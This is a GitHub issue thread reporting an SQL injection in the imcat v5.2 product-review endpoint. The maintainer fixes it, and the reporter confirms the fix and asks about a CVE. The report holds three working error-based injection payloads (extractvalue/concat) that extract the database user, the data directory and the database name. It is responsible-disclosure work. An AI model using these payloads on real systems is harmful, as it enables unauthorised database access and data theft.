Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Sql injection vulnerability in Latest Release v5.2 product reviews #5

Closed
Aquilao opened this issue Aug 2, 2020 · 4 comments
Closed

Comments

@Aquilao
Copy link

Aquilao commented Aug 2, 2020

Hi, I would like to report Sql injection vulnerability in latest release(v5.2) product reviews(/root/plus/coms/add_coms.php)

I found it in the demo(https://imcat.txjia.com/chn.php?crem&pid=2015-9h-n441)

Add a product reviews
imcat1

Test the fm[auser] in request body

payload:
'and/**/extractvalue('anything',concat('~',(select user())))and'
imcat2

payload:
'and/**/extractvalue('anything',concat('~',(select @@datadir)))and'
imcat3

payload
'and/**/extractvalue('anything',concat('~',(select database())))and'
image

@peacexie
Copy link
Owner

peacexie commented Aug 3, 2020

Thanks!

I checked this error message, It done ok for insert review,
It is the bug when deel with accumulate points for the member.
By the way, did your logined as a member?

I fixed this in the site: https://imcat.txjia.com/,
Can it stop you from attacking?

Hope your massage, I'll update master branch after your checked it.

@Aquilao
Copy link
Author

Aquilao commented Aug 3, 2020

Great.I just rechecked the SQL injection on the demo and it has been fixed.

By the way, I didn't logined when I found the vulnerability.

@peacexie
Copy link
Owner

peacexie commented Aug 3, 2020

OK, Thanks!

@Aquilao
Copy link
Author

Aquilao commented Aug 12, 2020

Hi,can you help me requests a CVE?
Requesting a CVE identification number-GitHub Docs
image
Thinks.

@peacexie peacexie pinned this issue Aug 29, 2020
@peacexie peacexie unpinned this issue Aug 29, 2020
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

2 participants